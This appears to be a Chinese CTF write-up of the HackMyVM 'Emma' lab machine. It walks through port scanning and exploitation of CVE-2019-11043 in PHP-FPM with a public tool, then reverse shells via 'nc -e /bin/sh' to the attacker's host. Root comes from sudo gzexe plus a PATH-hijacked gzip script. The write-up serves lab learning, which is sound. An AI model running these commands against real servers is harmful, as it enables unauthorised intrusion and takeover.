打靶记录(九四)之HMVEmma

所渗透的靶机IP为192.168.56.118

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.118                 
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 08:38 UTC
Nmap scan report for 192.168.56.118 (192.168.56.118)
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F7:CE:E7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.45 seconds

sudo nmap -sT -sV -sC -O -p22,80 192.168.56.118                
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 08:38 UTC
Nmap scan report for 192.168.56.118 (192.168.56.118)
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:4c:af:92:cc:bb:99:59:d7:2f:1b:99:fb:f1:7c:f0 (RSA)
|   256 ba:0d:85:69:43:86:c1:91:7c:db:2a:1e:34:ab:68:1e (ECDSA)
|_  256 a1:ac:2c:ce:f4:07:da:96:12:74:d1:54:9e:f7:09:04 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:F7:CE:E7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

sudo nmap --script=vuln -p22,80 192.168.56.118
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 08:39 UTC
Nmap scan report for 192.168.56.118 (192.168.56.118)
Host is up (0.00032s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|_  /phpinfo.php: Possible information file
MAC Address: 08:00:27:F7:CE:E7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 72.97 seconds

Getshell

访问根目录是空白，扫描一下目录

/robots.txt:itwasonlyakiss

以及一个phpinfo.php

没什么思路，看了下提示发现是CVE-2019-11043

利用: https://github.com/neex/phuip-fpizdam

./phuip-fpizdam http://192.168.56.118/index.php
2024/02/18 09:04:26 Base status code is 200
2024/02/18 09:04:26 Status code 502 for qsl=1765, adding as a candidate
2024/02/18 09:04:26 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2024/02/18 09:04:26 Attack params found: --qsl 1755 --pisos 38 --skip-detect
2024/02/18 09:04:26 Trying to set "session.auto_start=0"...
2024/02/18 09:04:26 Detect() returned attack params: --qsl 1755 --pisos 38 --skip-detect <-- REMEMBER THIS
2024/02/18 09:04:26 Performing attack using php.ini settings...
2024/02/18 09:04:26 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2024/02/18 09:04:26 Trying to cleanup /tmp/a...
2024/02/18 09:04:26 Done!

curl "http://192.168.56.118/index.php?a=id" -vv    

*   Trying 192.168.56.118:80...
*   Connected to 192.168.56.118 (192.168.56.118) port 80

> GET /index.php?a=id HTTP/1.1
> Host: 192.168.56.118
> User-Agent: curl/8.3.0
> Accept: */*
>
> < HTTP/1.1 200 OK
> < Server: nginx/1.14.2
> < Date: Sun, 18 Feb 2024 09:27:36 GMT
> < Content-Type: text/html; charset=UTF-8
> < Transfer-Encoding: chunked
> < Connection: keep-alive
> < X-Powered-By: PHP/7.1.33dev
> < 
> uid=33(www-data) gid=33(www-data) groups=33(www-data)

* Connection #0 to host 192.168.56.118 left intact

开启监听

curl "http://192.168.56.118/index.php?a=id;nc%20-e%20/bin/sh%20192.168.56.102%201234" -vv

也许是漏洞的特性，有时需要多curl几次才能执行命令

提权

发现开了一个mysql服务，用root:itwasonlyakiss凭证可以登录

user表中得到emma的密码哈希破解得到password

好吧，是我自作多情了，emma的密码就是那串哈希5f4dcc3b5aa765d61d8327deb882cf80

在家目录中有一个who，以及who.c源码，里面调用了/bin/id

sudo -l发现可以执行/usr/bin/gzexe,用于压缩可执行文件的指令，会改变源文件

sudo -u root /usr/bin/gzexe /bin/id

先以root身份对/bin/id进行压缩，然后

strings /bin/id

发现里面有一行

if tail $tail_n +$skip <"$0" | gzip -cd > "$gztmp"; then

相对路径地调用了gzip这个指令，可以试着劫持环境变量

echo 'nc -e /bin/sh 192.168.56.102 1234' >gzip
chmod +x gzip
export PATH=/tmp:$PATH

开启监听，执行/home/emma/who，现在我们是root!

碎碎念

对CVE-2019-11043不是特别熟悉，以后大概会复现一下。提权也非常有趣！